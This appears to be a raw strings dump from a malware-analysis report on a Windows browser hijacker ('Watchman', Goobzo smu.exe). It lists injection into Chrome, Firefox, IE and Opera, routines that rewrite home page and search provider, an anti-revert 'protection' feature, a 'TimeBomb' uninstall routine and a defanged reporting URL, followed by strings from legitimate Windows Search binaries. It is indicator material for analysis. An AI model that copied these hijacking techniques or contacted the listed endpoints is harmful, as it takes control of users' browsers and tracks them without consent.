Monitor::ServerReporter::SendInitialReport
Monitor::ServerReporter::SendInitialReport
/urlset:
/urlset:
Options.InjectAllBrowsers:
Options.InjectAllBrowsers:
Options.InjectDefaultOnly:
Options.InjectDefaultOnly:
Options.ServiceName:
Options.ServiceName:
Options.ProductCode:
Options.ProductCode:
Options.ProductPriority:
Options.ProductPriority:
Options.EnablePinner:
Options.EnablePinner:
Options.EnableRedirect:
Options.EnableRedirect:
Options.EnableYellowBandSuppression:
Options.EnableYellowBandSuppression:
Options.UpdateUrl:
Options.UpdateUrl:
Options.ReportUrl:
Options.ReportUrl:
Options.AutoStart:
Options.AutoStart:
Options.ProtectSearch:
Options.ProtectSearch:
Options.ProtectHome:
Options.ProtectHome:
Options.ProtectTab:
Options.ProtectTab:
Options.ExplorerInjection:
Options.ExplorerInjection:
Options.ChromeInjection:
Options.ChromeInjection:
Options.FirefoxInjection:
Options.FirefoxInjection:
Options.OperaInjection:
Options.OperaInjection:
Options.ConfigPath:
Options.ConfigPath:
Options.ConfigKey:
Options.ConfigKey:
Getting current URL Set
Getting current URL Set
Getting URL Set from options
Getting URL Set from options
] Provided. And is different from current URL set [
] Provided. And is different from current URL set [
URL Set [
URL Set [
general_config.xml
general_config.xml
system_config.xml
system_config.xml
[WatchmanInstaller::SendReport1]
[WatchmanInstaller::SendReport1]
iexplore.exe is running, result for getting DLL's:
iexplore.exe is running, result for getting DLL's:
firefox.exe is running, result for getting DLL's:
firefox.exe is running, result for getting DLL's:
chrome.exe is running, result for getting DLL's:
chrome.exe is running, result for getting DLL's:
ServerReporter::Create
ServerReporter::Create
URL to use:
URL to use:
ServerReporter::SendRegularReport
ServerReporter::SendRegularReport
[WatchmanInstaller::SendReport]
[WatchmanInstaller::SendReport]
Currently set URLSet:
Currently set URLSet:
Updating system config with new URL set...
Updating system config with new URL set...
Already reported duiring first install
Already reported duiring first install
Report' been sent:
Report' been sent:
WatchmanInstaller::SendReport1
WatchmanInstaller::SendReport1
calling SendReport1...
calling SendReport1...
WatchmanInstaller::SendReport
WatchmanInstaller::SendReport
[Monitor::WatchmanMonitor::CreateSendReportTask]
[Monitor::WatchmanMonitor::CreateSendReportTask]
SendReportTask
SendReportTask
new
new
[Monitor::WatchmanMonitor::OnSendReportSucceeded]
[Monitor::WatchmanMonitor::OnSendReportSucceeded]
[Monitor::WatchmanMonitor::OnSendReportFailed]
[Monitor::WatchmanMonitor::OnSendReportFailed]
Need to send report!!!
Need to send report!!!
Original report URL:
Original report URL:
ServerReporter::SendInitialReport
ServerReporter::SendInitialReport
[Monitor::WatchmanMonitor::OnChromeProtectionChanged]
[Monitor::WatchmanMonitor::OnChromeProtectionChanged]
User has changed the chrome protection for:
User has changed the chrome protection for:
[Monitor::WatchmanMonitor::OnResetFirefoxProtection]
[Monitor::WatchmanMonitor::OnResetFirefoxProtection]
User has reset the firefox protection:
User has reset the firefox protection:
Next report task:
Next report task:
Scheduller::RegisterTask
Scheduller::RegisterTask
Monitor::Application::EnsureSystemKey
Monitor::Application::EnsureSystemKey
Options.Revert:
Options.Revert:
Settings.Final:
Settings.Final:
ADVAPI32.DLL
ADVAPI32.DLL
shlwapi.dll
shlwapi.dll
Utils::Registry::OpenKeyExW
Utils::Registry::OpenKeyExW
Subkey:
Subkey:
[Utils::Registry::RecursiveDeleteKeyW]
[Utils::Registry::RecursiveDeleteKeyW]
SHLWAPI.GetAddressOf
SHLWAPI.GetAddressOf
WKERNEL32.DLL
WKERNEL32.DLL
VERSION.DLL
VERSION.DLL
hXXp://d1y2jryd6u59ns.cloudfront.net/p.ashx
hXXp://d1y2jryd6u59ns.cloudfront.net/p.ashx
\\.\pipe\
\\.\pipe\
Could not create thread event. %%s
Could not create thread event. %%s
Could not create new client event. %%s
Could not create new client event. %%s
Could not create accept thread. %%s
Could not create accept thread. %%s
Could not create work thread. %%s
Could not create work thread. %%s
Could not start thread. %%s
Could not start thread. %%s
Stop IPC error. %%s
Stop IPC error. %%s
Pipe (0x%X) read problems. %%s
Pipe (0x%X) read problems. %%s
NTDLL.DLL
NTDLL.DLL
Windows NT 6.1
Windows NT 6.1
%s?e=%s
%s?e=%s
zvl=%s&
zvl=%s&
%s?prd=%s&aff=%s&ver=%s&rnd=%d&usid=%s&pixGuid=%s
%s?prd=%s&aff=%s&ver=%s&rnd=%d&usid=%s&pixGuid=%s
&tss=%d&action=%s&actionparam=%s
&tss=%d&action=%s&actionparam=%s
[Utils::PipedProcess::CreateOutputHandles]
[Utils::PipedProcess::CreateOutputHandles]
[Utils::PipedProcess::CreateInputHandles]
[Utils::PipedProcess::CreateInputHandles]
[Utils::PipedProcess::SpawnProcess]
[Utils::PipedProcess::SpawnProcess]
Utils::PipedProcess::CreateOutputHandles
Utils::PipedProcess::CreateOutputHandles
Utils::PipedProcess::CreateInputHandles
Utils::PipedProcess::CreateInputHandles
Utils::PipedProcess::SpawnProcess
Utils::PipedProcess::SpawnProcess
[Utils::PipedProcess::Start]
[Utils::PipedProcess::Start]
[Utils::PipedProcess::Wait]
[Utils::PipedProcess::Wait]
Utils::PipedProcess::WriteProc
Utils::PipedProcess::WriteProc
[Utils::PipedProcess::WriteData]
[Utils::PipedProcess::WriteData]
Utils::PipedProcess::ReadProc
Utils::PipedProcess::ReadProc
[Utils::PipedProcess::ReadData]
[Utils::PipedProcess::ReadData]
.cache
.cache
ntdll.dll
ntdll.dll
Could not open memory object. Object name: %s. %%s
Could not open memory object. Object name: %s. %%s
Could not create memory object. Object name: %s. %%s
Could not create memory object. Object name: %s. %%s
Could not map memory object. Object name: %s. Size: %u. %%s
Could not map memory object. Object name: %s. Size: %u. %%s
Could not map memory object. Object name: %s. %%s
Could not map memory object. Object name: %s. %%s
Could not create sync object for memory. Object name: %s. %%s
Could not create sync object for memory. Object name: %s. %%s
pathToSignedProductExe
pathToSignedProductExe
SELECT * FROM Win32_OperatingSystem
SELECT * FROM Win32_OperatingSystem
[BrowserHistory::GetPropertyReport]
[BrowserHistory::GetPropertyReport]
Found URL:
Found URL:
X-hX-hX-XX-XXXXXX
X-hX-hX-XX-XXXXXX
IExecAction::put_Path
IExecAction::put_Path
IAction::QueryInterface
IAction::QueryInterface
IExecAction::put_Arguments
IExecAction::put_Arguments
IExecAction::put_WorkingDirectory
IExecAction::put_WorkingDirectory
http\shell\open\command
http\shell\open\command
Software\Microsoft\Windows\CurrentVersion\App Paths
Software\Microsoft\Windows\CurrentVersion\App Paths
[Utils::SoftwareInfo::GetHttpOpenHandler]
[Utils::SoftwareInfo::GetHttpOpenHandler]
Utils::Registry::OpenKeyW
Utils::Registry::OpenKeyW
SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy
SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy
Could not create pipe. %%s
Could not create pipe. %%s
Could not allocate IPC memory. Requires size: %u
Could not allocate IPC memory. Requires size: %u
Event error. %%s
Event error. %%s
Could not create pipe event. %%s
Could not create pipe event. %%s
Pipe connecting error. %%s
Pipe connecting error. %%s
Error code: %u ('%s')
Error code: %u ('%s')
Not enough memory. Size: %s (%s)
Not enough memory. Size: %s (%s)
Could not create IPC event. %%s
Could not create IPC event. %%s
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Content-Type: multipart/form-data; boundary=%s
Content-Type: multipart/form-data; boundary=%s
XXX
XXX
HTTP/1.1
HTTP/1.1
Content-Disposition: form-data; name="%s"
Content-Disposition: form-data; name="%s"
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings
HTTP/1.0
HTTP/1.0
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}
[SynchronousPipe::Read]
[SynchronousPipe::Read]
[SynchronousPipe::Write]
[SynchronousPipe::Write]
CChromeExtension::GetFileListInExtenstion
CChromeExtension::GetFileListInExtenstion
__MSG_
__MSG_
messages.json
messages.json
manifest.json
manifest.json
CHROME.EXE
CHROME.EXE
[Chrome::BrowserInfo::Query]
[Chrome::BrowserInfo::Query]
WebData
WebData
SHELL32.DLL
SHELL32.DLL
e\Application\chrome.exe
e\Application\chrome.exe
Google\Chrome
Google\Chrome
\resources.pak
\resources.pak
\Google\Chrome\Application\chrome.exe
\Google\Chrome\Application\chrome.exe
\Google\Chrome\Application\
\Google\Chrome\Application\
\Web Data
\Web Data
[SQLite::Implementation::AddProvider]
[SQLite::Implementation::AddProvider]
[SQLite::Implementation::GetProviderById]
[SQLite::Implementation::GetProviderById]
[SQLite::Implementation::GetFirstProviderId]
[SQLite::Implementation::GetFirstProviderId]
[SQLite::Implementation::GetProviderByKeyword]
[SQLite::Implementation::GetProviderByKeyword]
[SQLite::Implementation::GetProviderId]
[SQLite::Implementation::GetProviderId]
chrome-extension://
chrome-extension://
13050095043000000
13050095043000000
hXXp://api.searchpredict.com/api/?rqtype=ffplugin&siteID=8661&dbCode=1&command={searchTerms}
hXXp://api.searchpredict.com/api/?rqtype=ffplugin&siteID=8661&dbCode=1&command={searchTerms}
4BB42133-5533-4A0C-BF72-F1B8C8776A11
4BB42133-5533-4A0C-BF72-F1B8C8776A11
Checking
Checking
[Injection::Snapshot::Chrome::Settings::Dump]
[Injection::Snapshot::Chrome::Settings::Dump]
[Injection::Snapshot::Firefox::Settings::Dump]
[Injection::Snapshot::Firefox::Settings::Dump]
[Monitor::RestoreData::Controller::Build]
[Monitor::RestoreData::Controller::Build]
[Monitor::RestoreData::Controller::Build]
[Monitor::RestoreData::Controller::Build]
[Injection::Snapshot::Builder::BuildSettings]
[Injection::Snapshot::Builder::BuildSettings]
[Injection::Snapshot::Builder::BuildSettings]
[Injection::Snapshot::Builder::BuildSettings]
Injection::Snapshot::Parser::Parse
Injection::Snapshot::Parser::Parse
new
new
Injection::Snapshot::Parser::Parse
Injection::Snapshot::Parser::Parse
new
new
[Injection::Snapshot::Parser::Parse]
[Injection::Snapshot::Parser::Parse]
ReadStringNode
ReadStringNode
ReadStringNode
ReadStringNode
[Injection::Snapshot::Parser::Parse]
[Injection::Snapshot::Parser::Parse]
Chrome::BrowserSettings::Create
Chrome::BrowserSettings::Create
[Injection::Snapshot::Controller::IsChromeInstalled]
[Injection::Snapshot::Controller::IsChromeInstalled]
Firefox::BrowserSettings::Create
Firefox::BrowserSettings::Create
[Injection::Snapshot::Controller::IsFirefoxInstalled]
[Injection::Snapshot::Controller::IsFirefoxInstalled]
Firefox::BrowserSettings::RestoreState
Firefox::BrowserSettings::RestoreState
Chrome::BrowserSettings::RestoreState
Chrome::BrowserSettings::RestoreState
Argument.SystemConfig:
Argument.SystemConfig:
Argument.Config::User:
Argument.Config::User:
Argument.Config::General:
Argument.Config::General:
Chrome::BrowserSettings::PropagateState
Chrome::BrowserSettings::PropagateState
Firefox::BrowserSettings::PropagateState
Firefox::BrowserSettings::PropagateState
Argument.UserSid:
Argument.UserSid:
WatchmanKey::Users::SaveRestoreData
WatchmanKey::Users::SaveRestoreData
[WatchmanKey::GetEncryptionKey]
[WatchmanKey::GetEncryptionKey]
MachineKey::Generate
MachineKey::Generate
MachineKey::Create
MachineKey::Create
[WatchmanKey::LoadEncodedData]
[WatchmanKey::LoadEncodedData]
[WatchmanKey::CleanupKey]
[WatchmanKey::CleanupKey]
WatchmanKey::GetEncryptionKey
WatchmanKey::GetEncryptionKey
[WatchmanKey::SaveEncodedData]
[WatchmanKey::SaveEncodedData]
WatchmanKey::System::Open
WatchmanKey::System::Open
[WatchmanKey::System::LoadGeneralConfig]
[WatchmanKey::System::LoadGeneralConfig]
[WatchmanKey::System::SaveGeneralConfig]
[WatchmanKey::System::SaveGeneralConfig]
WatchmanKey::LoadEncodedData
WatchmanKey::LoadEncodedData
WatchmanKey::SaveEncodedData
WatchmanKey::SaveEncodedData
WatchmanKey::System::Ensure
WatchmanKey::System::Ensure
[WatchmanKey::System::SaveSystemConfig]
[WatchmanKey::System::SaveSystemConfig]
[WatchmanKey::System::LoadSystemConfig]
[WatchmanKey::System::LoadSystemConfig]
WatchmanKey::EnsureKey
WatchmanKey::EnsureKey
[WatchmanKey::Users::Ensure]
[WatchmanKey::Users::Ensure]
WatchmanKey::OpenKey
WatchmanKey::OpenKey
[WatchmanKey::Users::Open]
[WatchmanKey::Users::Open]
[WatchmanKey::Users::LoadConfiguration]
[WatchmanKey::Users::LoadConfiguration]
[WatchmanKey::Users::SaveConfiguration]
[WatchmanKey::Users::SaveConfiguration]
WatchmanKey::Users::Ensure
WatchmanKey::Users::Ensure
[WatchmanKey::Users::LoadRestoreData]
[WatchmanKey::Users::LoadRestoreData]
[WatchmanKey::Updater::SetLastTime]
[WatchmanKey::Updater::SetLastTime]
[WatchmanKey::Updater::GetBlackListHash]
[WatchmanKey::Updater::GetBlackListHash]
[WatchmanKey::Updater::SetBlackListHash]
[WatchmanKey::Updater::SetBlackListHash]
[WatchmanKey::Reporter::SetLastTime]
[WatchmanKey::Reporter::SetLastTime]
[WatchmanKey::Reporter::GetLastTime]
[WatchmanKey::Reporter::GetLastTime]
[WatchmanKey::TimeBomb::Uninstall]
[WatchmanKey::TimeBomb::Uninstall]
WatchmanKey::SystemKey::Open
WatchmanKey::SystemKey::Open
{CFBFAE00-17A6-11D0-99CB-00C04FD64497}
{CFBFAE00-17A6-11D0-99CB-00C04FD64497}
{7F4EFF06-7032-458e-AE16-1C1D8255C28A}
{7F4EFF06-7032-458e-AE16-1C1D8255C28A}
smod.xml
smod.xml
SearchModulePlus.crx
SearchModulePlus.crx
DATAMNGR.DLL
DATAMNGR.DLL
IEBHO.DLL
IEBHO.DLL
VC32.DLL
VC32.DLL
[Config::General::UrlSet::Copy]
[Config::General::UrlSet::Copy]
[Config::General::Chrome::Settings::Dump]
[Config::General::Chrome::Settings::Dump]
[Config::General::Chrome::ValueSet::Copy]
[Config::General::Chrome::ValueSet::Copy]
[Config::General::Chrome::Settings::Copy]
[Config::General::Chrome::Settings::Copy]
[Config::General::Firefox::Settings::Copy]
[Config::General::Firefox::Settings::Copy]
[Config::General::Firefox::Settings::Dump]
[Config::General::Firefox::Settings::Dump]
[Config::General::Opera::Settings::Dump]
[Config::General::Opera::Settings::Dump]
[Config::General::Firefox::ValueSet::Copy]
[Config::General::Firefox::ValueSet::Copy]
[Config::General::Opera::Settings::Copy]
[Config::General::Opera::Settings::Copy]
Config::General::Parser::ParseUrlSet
Config::General::Parser::ParseUrlSet
Config::General::Parser::ParseFirefoxSettings
Config::General::Parser::ParseFirefoxSettings
Config::General::Parser::ParseChromeSettings
Config::General::Parser::ParseChromeSettings
Config::General::Parser::ParseOperaSettings
Config::General::Parser::ParseOperaSettings
ReadStringNode
ReadStringNode
ReadStringNode
ReadStringNode
eReadStringNode
eReadStringNode
ReadStringNode
ReadStringNode
ReadStringNode
ReadStringNode
[Config::General::Parser::ParseChromeSettings]
[Config::General::Parser::ParseChromeSettings]
Config::General::Parser::ParseChromeValueSets
Config::General::Parser::ParseChromeValueSets
MissedElement
MissedElement
ReadStringNode
ReadStringNode
[Config::General::Parser::ParseChromeValueSets]
[Config::General::Parser::ParseChromeValueSets]
ReadStringNode
ReadStringNode
ReadStringNode
ReadStringNode
[Config::General::Parser::ParseFirefoxSettings]
[Config::General::Parser::ParseFirefoxSettings]
ReadStringNode
ReadStringNode
Config::General::Parser::ParseFirefoxValueSets
Config::General::Parser::ParseFirefoxValueSets
MissedElement
MissedElement
ReadOptionalStringNode
ReadOptionalStringNode
[Config::General::Parser::ParseFirefoxValueSets]
[Config::General::Parser::ParseFirefoxValueSets]
ReadOptionalStringNode
ReadOptionalStringNode
lReadOptionalStringNode
lReadOptionalStringNode
MissedElement
MissedElement
[Config::General::Parser::ParseUrlSet]
[Config::General::Parser::ParseUrlSet]
ReadStringNode
ReadStringNode
ReadStringNode
ReadStringNode
yReadStringNode
yReadStringNode
ReadStringNode
ReadStringNode
[Config::General::Parser::ParseOperaSettings]
[Config::General::Parser::ParseOperaSettings]
ReadStringNode
ReadStringNode
MissedElement
MissedElement
ReadStringNode
ReadStringNode
[Config::General::Builder::Build]
[Config::General::Builder::Build]
[Config::General::Builder::Build]
[Config::General::Builder::Build]
[Config::General::Builder::Build]
[Config::General::Builder::Build]
We couldn't find the URL Set section... probably an old configuration!
We couldn't find the URL Set section... probably an old configuration!
WatchmanKey::System::LoadGeneralConfig
WatchmanKey::System::LoadGeneralConfig
WatchmanKey::System::SaveGeneralConfig
WatchmanKey::System::SaveGeneralConfig
2.1.0.7
2.1.0.7
2.0.0.0
2.0.0.0
ReadOptionalStringNode
ReadOptionalStringNode
ReadStringNode
ReadStringNode
ReadStringNode
ReadStringNode
ReadBooleanNode
ReadBooleanNode
ReadBooleanNode
ReadBooleanNode
Could not find URL Set in configuration. Probably older configuration.
Could not find URL Set in configuration. Probably older configuration.
ReadBooleanNode
ReadBooleanNode
WatchmanKey::System::LoadSystemConfig
WatchmanKey::System::LoadSystemConfig
WatchmanKey::System::SaveSystemConfig
WatchmanKey::System::SaveSystemConfig
[Config::User::Chrome::Settings::Copy]
[Config::User::Chrome::Settings::Copy]
[Config::User::Firefox::Settings::Copy]
[Config::User::Firefox::Settings::Copy]
Config::User::Parser::ParseChromeSettings
Config::User::Parser::ParseChromeSettings
Config::User::Parser::ParseFirefoxSettings
Config::User::Parser::ParseFirefoxSettings
[Config::User::Parser::ParseChromeSettings]
[Config::User::Parser::ParseChromeSettings]
[Config::User::Parser::ParseFirefoxSettings]
[Config::User::Parser::ParseFirefoxSettings]
[Config::User::Builder::BuildFirefoxSettings]
[Config::User::Builder::BuildFirefoxSettings]
[Config::User::Builder::BuildChromeSettings]
[Config::User::Builder::BuildChromeSettings]
WatchmanKey::User::LoadConfiguration
WatchmanKey::User::LoadConfiguration
WatchmanKey::User::SaveConfiguration
WatchmanKey::User::SaveConfiguration
Mozilla\Firefox\
Mozilla\Firefox\
profiles.ini
profiles.ini
prefs.js
prefs.js
[Firefox::InstallInfo::ReadProfiles]
[Firefox::InstallInfo::ReadProfiles]
[Firefox::InstallInfo::QueryProfiles]
[Firefox::InstallInfo::QueryProfiles]
[Firefox::InstallInfo::ParseProfiles]
[Firefox::InstallInfo::ParseProfiles]
Firefox::InstallInfo::ReadProfiles
Firefox::InstallInfo::ReadProfiles
Firefox::InstallInfo::ParseProfiles
Firefox::InstallInfo::ParseProfiles
[Firefox::InstallInfo::Query]
[Firefox::InstallInfo::Query]
No profiles found! Maybe - first start of Firefox?
No profiles found! Maybe - first start of Firefox?
[Firefox::BrowserSettings::MakeSnapshot]
[Firefox::BrowserSettings::MakeSnapshot]
[Firefox::BrowserSettings::RestoreState]
[Firefox::BrowserSettings::RestoreState]
[Firefox::BrowserSettings::PropagateState]
[Firefox::BrowserSettings::PropagateState]
Software\Microsoft\Windows\CurrentVersion\Ext\Settings
Software\Microsoft\Windows\CurrentVersion\Ext\Settings
Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects
Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects
Software\Microsoft\Internet Explorer\AboutURLs
Software\Microsoft\Internet Explorer\AboutURLs
TopResultURLFallback
TopResultURLFallback
SuggestionURL
SuggestionURL
FaviconURL
FaviconURL
IEXPLORE.EXE
IEXPLORE.EXE
Failed to call enum URL's. Error:
Failed to call enum URL's. Error:
Software\Microsoft\Internet Explorer\URLSearchHooks
Software\Microsoft\Internet Explorer\URLSearchHooks
[Explorer::BrowserSettings::SetMainKeyValues]
[Explorer::BrowserSettings::SetMainKeyValues]
[Explorer::BrowserSettings::SetTabbedBrowsingKeyValues]
[Explorer::BrowserSettings::SetTabbedBrowsingKeyValues]
[Explorer::BrowserSettings::SetSearchScopeKeyValues]
[Explorer::BrowserSettings::SetSearchScopeKeyValues]
[Explorer::BrowserSettings::SetAboutURLsKeyValues]
[Explorer::BrowserSettings::SetAboutURLsKeyValues]
Result.SearchScope:
Result.SearchScope:
Argument.SearchScopeToSearch:
Argument.SearchScopeToSearch:
Argument.Parent:
Argument.Parent:
[Explorer::BrowserSettings::DeleteKey]
[Explorer::BrowserSettings::DeleteKey]
Argument.Subkey:
Argument.Subkey:
VirtualSpeedbitSearchScopeKey::EnsureKeyW
VirtualSpeedbitSearchScopeKey::EnsureKeyW
Key deleted:
Key deleted:
TopResultURL
TopResultURL
FaviconURLFallback
FaviconURLFallback
SuggestionsURL
SuggestionsURL
SuggestionsURLFallback
SuggestionsURLFallback
\Opera\launcher.exe
\Opera\launcher.exe
Opera Software\Opera Stable\
Opera Software\Opera Stable\
\Opera\
\Opera\
\opera.pak
\opera.pak
Web Data
Web Data
\resources\default_partner_content.json
\resources\default_partner_content.json
KERNELBASE.DLL
KERNELBASE.DLL
Chrome::InstallInfo::Get
Chrome::InstallInfo::Get
[Chrome::BrowserSettings::OpenConfigFiles]
[Chrome::BrowserSettings::OpenConfigFiles]
SQLite::WebDataDB::Create
SQLite::WebDataDB::Create
Argument.HomePageUrl:
Argument.HomePageUrl:
[Chrome::BrowserSettings::SetHomePagePreferences]
[Chrome::BrowserSettings::SetHomePagePreferences]
[Chrome::BrowserSettings::SetDefaultProviderPreferences]
[Chrome::BrowserSettings::SetDefaultProviderPreferences]
Argument.HomePageIsNewTabPage:
Argument.HomePageIsNewTabPage:
Argument.DefaultProviderKeyWord:
Argument.DefaultProviderKeyWord:
Argument.DefaultProviderId:
Argument.DefaultProviderId:
Argument.DefaultProviderEncoding:
Argument.DefaultProviderEncoding:
Argument.DefaultProviderName:
Argument.DefaultProviderName:
Argument.DefaultProviderIconUrl:
Argument.DefaultProviderIconUrl:
Argument.DefaultProviderSearchUrl:
Argument.DefaultProviderSearchUrl:
[Chrome::BrowserSettings::SetRestoreOnStartupPreferences]
[Chrome::BrowserSettings::SetRestoreOnStartupPreferences]
Argument.DefaultProviderSuggestUrl:
Argument.DefaultProviderSuggestUrl:
Argument.UrlsToRestoreOnStartup:
Argument.UrlsToRestoreOnStartup:
Argument.RestoreOnStartup:
Argument.RestoreOnStartup:
Argument.KeywordToSearch:
Argument.KeywordToSearch:
[Chrome::BrowserSettings::GetSearchProviderId]
[Chrome::BrowserSettings::GetSearchProviderId]
SQLite::WebDataDB::GetProviderById
SQLite::WebDataDB::GetProviderById
SQLite::WebDataDB::GetFirstProviderId
SQLite::WebDataDB::GetFirstProviderId
[Chrome::BrowserSettings::EnsureSearchProvider]
[Chrome::BrowserSettings::EnsureSearchProvider]
Result.ProviderId:
Result.ProviderId:
[Chrome::BrowserSettings::DeleteSearchProvider]
[Chrome::BrowserSettings::DeleteSearchProvider]
SQLite::WebDataDB::Values::Create
SQLite::WebDataDB::Values::Create
[Chrome::BrowserSettings::MakeSnapshot]
[Chrome::BrowserSettings::MakeSnapshot]
[Chrome::BrowserSettings::RestoreState]
[Chrome::BrowserSettings::RestoreState]
Chrome::BrowserSettings::DeleteSearchProvider
Chrome::BrowserSettings::DeleteSearchProvider
Chrome::BrowserSettings::OpenConfigFiles
Chrome::BrowserSettings::OpenConfigFiles
SQLite::WebDataDB::SetDefaultProvider
SQLite::WebDataDB::SetDefaultProvider
[Chrome::BrowserSettings::PropagateState]
[Chrome::BrowserSettings::PropagateState]
Chrome::BrowserSettings::EnsureSearchProvider
Chrome::BrowserSettings::EnsureSearchProvider
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smu.exe
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smu.exe
SearchProtocolHost.exe_3464:
.text
.text
`.data
`.data
.rsrc
.rsrc
@.reloc
@.reloc
ADVAPI32.dll
ADVAPI32.dll
ntdll.DLL
ntdll.DLL
KERNEL32.dll
KERNEL32.dll
msvcrt.dll
msvcrt.dll
USER32.dll
USER32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
TQUERY.DLL
TQUERY.DLL
MSSHooks.dll
MSSHooks.dll
IMM32.dll
IMM32.dll
SHLWAPI.dll
SHLWAPI.dll
SrchCollatorCatalogInfo
SrchCollatorCatalogInfo
SrchDSSLogin
SrchDSSLogin
SrchDSSPortManager
SrchDSSPortManager
SrchPHHttp
SrchPHHttp
SrchIndexerQuery
SrchIndexerQuery
SrchIndexerProperties
SrchIndexerProperties
SrchIndexerPlugin
SrchIndexerPlugin
SrchIndexerClient
SrchIndexerClient
SrchIndexerSchema
SrchIndexerSchema
Msidle.dll
Msidle.dll
Failed to get REGKEY_FLTRDMN_MS_TO_IDLE, using default
Failed to get REGKEY_FLTRDMN_MS_TO_IDLE, using default
pfps->psProperty.ulKind is LPWSTR but psProperty.lpwstr is NULL or empty
pfps->psProperty.ulKind is LPWSTR but psProperty.lpwstr is NULL or empty
d:\win7sp1_gdr\enduser\mssearch2\common\utils\crchash.cxx
d:\win7sp1_gdr\enduser\mssearch2\common\utils\crchash.cxx
d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrdmn\fltrdaemon.cxx
d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrdmn\fltrdaemon.cxx
d:\win7sp1_gdr\enduser\mssearch2\search\common\include\secutil.hxx
d:\win7sp1_gdr\enduser\mssearch2\search\common\include\secutil.hxx
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracerhelpers.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracerhelpers.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp
d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx
d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx
RegDeleteKeyW
RegDeleteKeyW
RegDeleteKeyExW
RegDeleteKeyExW
8%uiP
8%uiP
Invalid parameter passed to C runtime function.
Invalid parameter passed to C runtime function.
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp
-d-d-d-d-d-d-d-%d
-d-d-d-d-d-d-d-%d
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h
0xx=
0xx=
%s(%d)
%s(%d)
tid="0x%x"
tid="0x%x"
pid="0x%x"
pid="0x%x"
tagname="%s"
tagname="%s"
tagid="0x%x"
tagid="0x%x"
el="0x%x"
el="0x%x"
time="d/d/d d:d:d.d"
time="d/d/d d:d:d.d"
logname="%s"
logname="%s"
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx
SHELL32.dll
SHELL32.dll
PROPSYS.dll
PROPSYS.dll
ntdll.dll
ntdll.dll
RegCloseKey
RegCloseKey
RegCreateKeyExW
RegCreateKeyExW
RegOpenKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegQueryInfoKeyW
RegEnumKeyExW
RegEnumKeyExW
ReportEventW
ReportEventW
_amsg_exit
_amsg_exit
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
SearchProtocolHost.pdb
SearchProtocolHost.pdb
2 2(20282|2
2 2(20282|2
4%5S5
4%5S5
Software\Microsoft\Windows Search
Software\Microsoft\Windows Search
https
https
kernel32.dll
kernel32.dll
msTracer.dll
msTracer.dll
msfte.dll
msfte.dll
lX-X-X-XX-XXXXXX
lX-X-X-XX-XXXXXX
SOFTWARE\Microsoft\Windows Search
SOFTWARE\Microsoft\Windows Search
tquery.dll
tquery.dll
%s\%s
%s\%s
HKEY_CLASSES_ROOT
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
HKEY_CURRENT_CONFIG
Windows Search Service
Windows Search Service
0xx%p%S%d
0xx%p%S%d
advapi32.dll
advapi32.dll
WAPI-MS-Win-Core-LocalRegistry-L1-1-0.dll
WAPI-MS-Win-Core-LocalRegistry-L1-1-0.dll
winhttp.dll
winhttp.dll
Software\Microsoft\Windows Search\Tracing
Software\Microsoft\Windows Search\Tracing
Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported
Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported
Software\Microsoft\Windows Search\Tracing\EventThrottleState
Software\Microsoft\Windows Search\Tracing\EventThrottleState
%S(%d)
%S(%d)
tagname="%S"
tagname="%S"
logname="%S"
logname="%S"
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
.\%s.mui
.\%s.mui
.\%s\%s.mui
.\%s\%s.mui
%s\%s.mui
%s\%s.mui
%s\%s\%s.mui
%s\%s\%s.mui
Microsoft Windows Search Protocol Host
Microsoft Windows Search Protocol Host
7.00.7601.17610 (win7sp1_gdr.110503-1502)
7.00.7601.17610 (win7sp1_gdr.110503-1502)
SearchProtocolHost.exe
SearchProtocolHost.exe
Windows
Windows
7.00.7601.17610
7.00.7601.17610
SearchFilterHost.exe_3964:
.text
.text
`.data
`.data
.rsrc
.rsrc
@.reloc
@.reloc
